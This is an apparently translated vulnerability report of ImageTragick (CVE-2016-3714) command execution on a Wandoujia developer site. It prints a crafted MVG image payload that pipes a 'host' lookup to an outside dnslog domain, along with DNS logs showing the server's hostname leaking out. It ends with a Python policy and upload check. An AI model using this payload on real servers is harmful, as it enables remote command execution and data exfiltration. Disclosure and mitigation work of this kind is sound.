Command execution on a Wandoujia site
It seems none of the earlier ones have been fixed.
CVE-2016-3714 and a new bypass method
Developer site
http://open.wandoujia.com/account/info
In the developer verification flow, at the business license upload field, upload the crafted image:
push graphic-context
viewbox 0 0 640 480
image Over 0,0 0,0 '|host zzz.zzz.dnslog.info'
pop graphic-context
Requests observed in cloudeye:
31-May-2016 22:23:06.450 queries: client 111.206.15.136#3139 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN A -ED (128.199.200.236)
31-May-2016 22:23:06.631 queries: client 111.206.14.132#38484 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN AAAA -ED (128.199.200.236)
31-May-2016 22:23:06.818 queries: client 111.206.14.132#41208 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN MX -ED (128.199.200.236)
31-May-2016 22:23:10.717 queries: client 111.206.14.132#62669 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN A -ED (128.199.200.236)
31-May-2016 22:23:10.917 queries: client 111.206.15.136#23942 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN AAAA -ED (128.199.200.236)
ag-devcenter0-cnc1.hlg01 is the hostname of the current server.
Solution:
Add the following code to /etc/ImageMagick/policy.xml
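An added example, not part of the original report (whose policy snippet is missing from this page): a Python check that a policy.xml denies the coders named in the public ImageTragick (CVE-2016-3714) mitigation advice, plus a signature check that rejects text-based uploads such as MVG. The function names, the sample policies and the JPEG/PNG/GIF allow-list are assumptions.

```python
import xml.etree.ElementTree as ET
from fnmatch import fnmatchcase

# Coders that the public ImageTragick (CVE-2016-3714) advisory says to disable.
RISKY_CODERS = ("EPHEMERAL", "URL", "HTTPS", "MVG", "MSL")

# Leading bytes of the raster formats an upload form like this would accept
# (assumed allow-list: JPEG, PNG, GIF).
RASTER_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")


def undenied_coders(policy_xml, coders=RISKY_CODERS):
    """Return the coders not covered by a <policy domain="coder" rights="none">.

    Patterns are matched as simple globs; entry ordering is not modelled.
    """
    root = ET.fromstring(policy_xml)
    denied = [
        p.get("pattern", "").upper()
        for p in root.iter("policy")
        if p.get("domain", "").lower() == "coder"
        and p.get("rights", "").lower() == "none"
    ]
    return [c for c in coders if not any(fnmatchcase(c, pat) for pat in denied)]


def is_allowed_raster(data):
    """True only if the upload starts with an allow-listed raster signature."""
    return data.startswith(RASTER_MAGIC)


# Constructed sample policies (not taken from the affected server).
WEAK_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="URL"/>
</policymap>"""

HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="URL"/>
  <policy domain="coder" rights="none" pattern="HTTPS"/>
  <policy domain="coder" rights="none" pattern="MVG"/>
  <policy domain="coder" rights="none" pattern="MSL"/>
</policymap>"""

if __name__ == "__main__":
    print("weak policy leaves enabled:", undenied_coders(WEAK_POLICY))
    print("hardened policy leaves enabled:", undenied_coders(HARDENED_POLICY))
    # Constructed MVG header: plain text, so it fails the signature check.
    print("MVG accepted:", is_allowed_raster(b"push graphic-context\n"))
```

Run the signature check on the raw upload before it reaches ImageMagick, and run the policy audit against the policy.xml that the deployed ImageMagick build actually loads.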